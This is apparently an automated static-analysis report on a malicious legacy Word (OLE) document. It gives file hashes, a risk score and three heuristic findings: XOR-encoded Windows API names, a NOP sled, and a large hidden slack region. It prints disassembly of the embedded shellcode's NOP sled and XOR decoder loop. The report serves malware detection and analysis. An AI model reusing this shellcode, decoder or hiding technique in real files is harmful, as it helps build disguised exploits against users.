Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eb5b31935a41f6a5…

MALICIOUS

Office (OLE)

Size: 529.0 KB
Created: 2007-12-03 01:19:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-30
MD5: 34c014726ab9271880fe466eb966687b
SHA-1: d2a439c6c44de3ede162458d14714dc290d3a5f5
SHA-256: eb5b31935a41f6a587459cbf22476b248c4eed70ce5e2724244ed9e73592964d
Risk score: 140

Heuristics (3)

  • XOR-encoded strings (key 0x95) critical SC_XOR_ENCODED
    Found 8 Windows library/API name(s) XOR-encoded with single-byte key 0x95: 'kernel32.dll', 'LoadLibraryA', 'LoadLibraryW', 'GetProcAddress', 'VirtualAlloc', 'VirtualAlloc', 'VirtualAllocEx', 'VirtualProtect'
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'add' is 79% of instructions — a sled or padding/filler run, not program logic).
  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly
    x86 disassembly · validity: uncertain (0.568) — 5/7 branch targets land on an instruction boundary (71% coherence)
    00001900  90                nop
    00001901  90                nop
    00001902  90                nop
    00001903  90                nop
    00001904  90                nop
    00001905  90                nop
    00001906  90                nop
    00001907  90                nop
    00001908  90                nop
    00001909  90                nop
    0000190A  90                nop
    0000190B  90                nop
    0000190C  90                nop
    0000190D  90                nop
    0000190E  90                nop
    0000190F  90                nop
    00001910  90                nop
    00001911  90                nop
    00001912  90                nop
    00001913  90                nop
    00001914  90                nop
    00001915  90                nop
    00001916  90                nop
    00001917  90                nop
    00001918  90                nop
    00001919  90                nop
    0000191A  90                nop
    0000191B  90                nop
    0000191C  90                nop
    0000191D  90                nop
    0000191E  90                nop
    0000191F  90                nop
    00001920  57                push edi
    00001921  5b                pop ebx
    00001922  81ebf0150000      sub ebx, 0x15f0
    00001928  8bd3              mov edx, ebx
    0000192A  4a                dec edx
    0000192B  33c9              xor ecx, ecx
    0000192D  b9a7030000        mov ecx, 0x3a7
    00001932  80340ab0          xor byte ptr [edx + ecx], 0xb0
    00001936  e2fa              loop 0x1932
    00001938  315cb0b1          xor dword ptr [eax + esi*4 - 0x4f], ebx
    0000193C  b0b0              mov al, 0xb0
    0000193E  3b5c3375          cmp ebx, dword ptr [ebx + esi + 0x75]
    00001942  b43b              mov ah, 0x3b
    00001944  3f                aas
    00001945  78b2              js 0x18f9
    00001947  b0b0              mov al, 0xb0
    00001949  39fd              cmp ebp, edi
    0000194B  e83b3f08b2        call 0xb208588b
    00001950  b0b0              mov al, 0xb0
    00001952  39fd              cmp ebp, edi
    00001954  e431              in al, 0x31
    00001956  7768              ja 0x19c0
    00001958  b1b0              mov cl, 0xb0
    0000195A  b03b              mov al, 0x3b
    0000195C  7f39              jg 0x1997
    0000195E  3d                .byte 0x3d
    0000195F  30                .byte 0x30
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 541,696 bytes but its declared streams total only 16,486 bytes — 525,210 bytes (97%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).